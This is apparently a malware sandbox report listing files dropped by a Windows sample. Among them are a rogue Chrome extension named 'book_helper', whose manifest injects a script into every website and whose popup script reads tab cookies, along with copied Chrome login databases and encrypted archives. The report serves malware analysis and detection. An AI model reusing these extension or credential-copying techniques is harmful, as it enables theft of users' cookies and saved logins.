                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
                                                                                                                                                                        MD5:E35B805293CCD4F74377E9959C35427D
                                                                                                                                                                        SHA1:9755C6F8BAB51BD40BD6A51D73BE2570605635D1
                                                                                                                                                                        SHA-256:2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
                                                                                                                                                                        SHA-512:6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: .PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O.*.!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B* ..dh)...l.:|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):93637
                                                                                                                                                                        Entropy (8bit):5.292996107428883
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                                                                                        MD5:E1288116312E4728F98923C79B034B67
                                                                                                                                                                        SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                                                                                        SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                                                                                        SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: /*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\manifest.json
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2380
                                                                                                                                                                        Entropy (8bit):5.687293760500434
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
                                                                                                                                                                        MD5:ADF10776EEC8DC0F6E7E3B4AD59CF504
                                                                                                                                                                        SHA1:4F11FE569189036B42923EF5A8AFB0985DCECDF5
                                                                                                                                                                        SHA-256:ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
                                                                                                                                                                        SHA-512:7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: {.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http://*/*", "https://*/*" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.html
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                        Entropy (8bit):5.048307538221611
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
                                                                                                                                                                        MD5:E93B02D6CFFCCA037F3EA55DC70EE969
                                                                                                                                                                        SHA1:DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
                                                                                                                                                                        SHA-256:B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
                                                                                                                                                                        SHA-512:F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: <!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.js
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):642
                                                                                                                                                                        Entropy (8bit):4.985939227199713
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
                                                                                                                                                                        MD5:2AC02EE5F808BC4DEB832FB8E7F6F352
                                                                                                                                                                        SHA1:05375EF86FF516D91FB9746C0CBC46D2318BEB86
                                                                                                                                                                        SHA-256:DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
                                                                                                                                                                        SHA-512:6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: $(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):5468
                                                                                                                                                                        Entropy (8bit):5.178424878725887
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:nq6CbKM/XwdV8zsVPyk0JCKL8eGbOEQVuwv:nq6Cbh/gdVFy4K7
                                                                                                                                                                        MD5:E52AE16D8295111F41CE1017D6BBD717
                                                                                                                                                                        SHA1:13B9B7EB0D9803835987D908F328C5D2A67EFDCD
                                                                                                                                                                        SHA-256:B3F3400CE3E6F70DC2C916F71D3079799D8BCDA3F2321658091720CC0371A630
                                                                                                                                                                        SHA-512:F56A537EF5C61B285EB70847DCF3F1DD36E7BBB1A74419F51332BA99DCBA3992E89E6BCA69E61676668D26A7E2D47CE0FA2DFD19021DEB5451BA5417BB659D55
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13245951485918895","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0",
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):34636
                                                                                                                                                                        Entropy (8bit):5.537941123959356
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:gEyODNUckPWmr+VqLlCL1kXqKf/pUZNCgVLH2Hf6rUQGAnih9e:R5OLlvAnt
                                                                                                                                                                        MD5:A8880AA0B82D2CAA5A706D133ACD3070
                                                                                                                                                                        SHA1:92AC70E91495CCEBB080E1EDB657BFD0E810AC09
                                                                                                                                                                        SHA-256:DC1465579AB0AF761868D09122E283E44FBF2EFF167977C1A1BE71870C9542D0
                                                                                                                                                                        SHA-512:35E15BC84290D122286DE1404345FF9A5A2D55AF6B039B6F624C932B15CE7A3EABD4E5181810223744A0F320225DDF2D266C72916B74FACC6340ADB5FCB16679
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview: {"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245951492913444","lastpingday":"13245947458072931","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m
                                                                                                                                                                        C:\Users\user\AppData\Local\Login Data1612045889505
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.792852251086831
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Login Data1612045902661
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.792852251086831
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1612045891739
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:7-zip archive data, version 0.3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):37737
                                                                                                                                                                        Entropy (8bit):7.994967159065528
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
                                                                                                                                                                        MD5:5A6469A3F787ABD2AE93B47470528F79
                                                                                                                                                                        SHA1:4032B59237CC883FB752D9727971B435F4D27EB8
                                                                                                                                                                        SHA-256:1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
                                                                                                                                                                        SHA-512:335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: 7z..'...IVw '......."........S.......8%D...2 ..J...y1.C.......HE89.V.Z',n*.$.T.V.....O.%{.I.6!....."..:.L..nrH..A.m.......5.M.o......Q...r......|.k1..S"..w"Y...2pS....g.....V:y.;..+..P..8F.t...).&:.!j.....=...%.d.b.u.&..4y.<.97.[.`L]7...sZ.;.K..EA.lIO....N....D..\C.enT.f.....t.....]..w.....E...Ffc.$.Sw`].%.J.{........y.n2F.......v...#t.^.....Si&wb..A.@..#....bi_.....;..........!.~..........g.Q.@/.1\....*.f.q.=..t...).<|...?u.....JH.CD..i.s..4..c9.;X.._r7.9..{...wfg..:/.....?j.N.z....+...j)...K..v...4.9.......t.ZN...#.W.e...o...V..z...u...lNR..z.....fi.y.k......$...,N[.....F.U..~oJ.Cn.....+H..)....)!l...............8.....Z..(....L.~.....fsQ..W........p........q..T.....p.....uC..,;......1Pl...|.....G......-....=............L.......}O8y....H...g...E..c...k2c...&...4...]?A....FG....._.W.B?....p.X..gC........G...._Y.A..P..........k.../.7YO.c.M.i....|..^.+RP]...D.jq.z'..4.|I*......jq..w.%..2/|.....>..y...>......C.)8B7$Z...{P.~..&...b..........
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1612045892739
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:7-zip archive data, version 0.3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):553040
                                                                                                                                                                        Entropy (8bit):7.999671101282436
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
                                                                                                                                                                        MD5:A4427F2F46DEEA15CEA87BDBB53A22CC
                                                                                                                                                                        SHA1:158501079514868D85246E970314A024FF263199
                                                                                                                                                                        SHA-256:18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
                                                                                                                                                                        SHA-512:334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: 7z..'.....7..p......$........1...(..`(...<.^..-.+....Q.3D-.........i..si.a.,V.k.{JU.dk.'.h... KR.$~W...&. ..........<Y9.,.0.k+.<b...?zqlnw......\..5C...^...y.... ..FZ..0.$.....vds.....Yx.Q...x.._..Yk..n.>&.Y..7.B=.(.8.w<...sVs.V..6<o.(......b..t..b..@...~.........\..Y:r!ix....$!...{.h..,.......J..M".....0N.^..@..X.8.`...=._].._f.Q..D...3.==0..)f...............s..:...Gd...(!L....A)*:..r...>.....@.4.."s..G......j.7...{\...[..=.+y7..0.'...................i..d...!..b...c.s.}..g..(!,.H@<sl.*Y..'*....dm..?B.c7S..{...f...c...P.S.#...w=.+.M.U@u.....^.XI.....!u}...?.SYUK....O...G.]+.^....'..`&.a....F.......c..o....c..Z4.......Q1..1L..J.p.>...j.!.il>..y8..S...@....7..Hc...y...UNJj..9...@.../.'#.....N...BC?..C....Ga[J.vb....mn..@..z.../Kc.,Y<.tA*.2...O......|....Drrl)..7..9.....pNj.P6|].t .'.|.yb..SO.......`....H..-..h.+x..4...v1. ...'.4)3.N..,2_.U..]...I4y.R.I.....b.......N!e%.4.0*"l,.H.2..'..^42....9..sX..1.....8z.u#A\.....tbP........&...U....9
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        Process:C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4453376
                                                                                                                                                                        Entropy (8bit):7.745694560857276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:98304:bCgleegKSmFIJuPzyoCe1NGDyqMcKzH4znz8xViN:bBbviJu7JC0UDLwzanz8xQ
                                                                                                                                                                        MD5:18169F98E39AE228D131AEC477C8A2E9
                                                                                                                                                                        SHA1:C6C6EACAA8DF6EA5251C7F26A2D9EC4317092E6A
                                                                                                                                                                        SHA-256:344B323928698D9982C7577E5405A1CB587C45F94A0F6745827648381397F255
                                                                                                                                                                        SHA-512:8DEACA50E918252BA85715C85096E810733A9512C656FA40AD71E22437CC8F74D1965468592929A4B1216D33DA598C308B312F5C1AA770F62959C873A4582EFB
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 35%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: fnhcdXEfus.exe, Detection: malicious, Browse
                                                                                                                                                                        Preview: MZ......................@.............................................d....L.!This program cannot be run in DOS mode....$.............Z..Z..Zw]qZ..Zw]lZ..Z$\oZ..Z$\lZZ..Z)..Z..Z$\mZ...Z)..Z...Z..Zu..Zw]mZ.Zw]kZ..Z.5Z..Zw]nZ..ZRich..Z........................PE..L...n..[.................F..........:R.......`....@.......................... ............@................................................................ ..T....h..8............................w..@............`...............................text....D.......F.................. ....rdata..*f...`...h...J..............@..@.data...p........$..................@....rsrc..............................@..@.reloc....... .......p..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe:Zone.Identifier
                                                                                                                                                                        Process:C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp
                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):6656
                                                                                                                                                                        Entropy (8bit):5.2861874904617645
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
                                                                                                                                                                        MD5:84878B1A26F8544BDA4E069320AD8E7D
                                                                                                                                                                        SHA1:51C6EE244F5F2FA35B563BFFB91E37DA848A759C
                                                                                                                                                                        SHA-256:809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
                                                                                                                                                                        SHA-512:4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: 6MhmlD8KZh.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: fnhcdXEfus.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.._F..e..&m...e...e...e...i...e...i...e...i...e..Rich.e..........PE..L......D...........!......................... ...............................@.......................................$......H#..P............................0......p ............................................... ..l............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):268744
                                                                                                                                                                        Entropy (8bit):5.398284390686728
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
                                                                                                                                                                        MD5:E2E9483568DC53F68BE0B80C34FE27FB
                                                                                                                                                                        SHA1:8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
                                                                                                                                                                        SHA-256:205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
                                                                                                                                                                        SHA-512:B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 8%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: fnhcdXEfus.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: N1yprTBBXs.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................
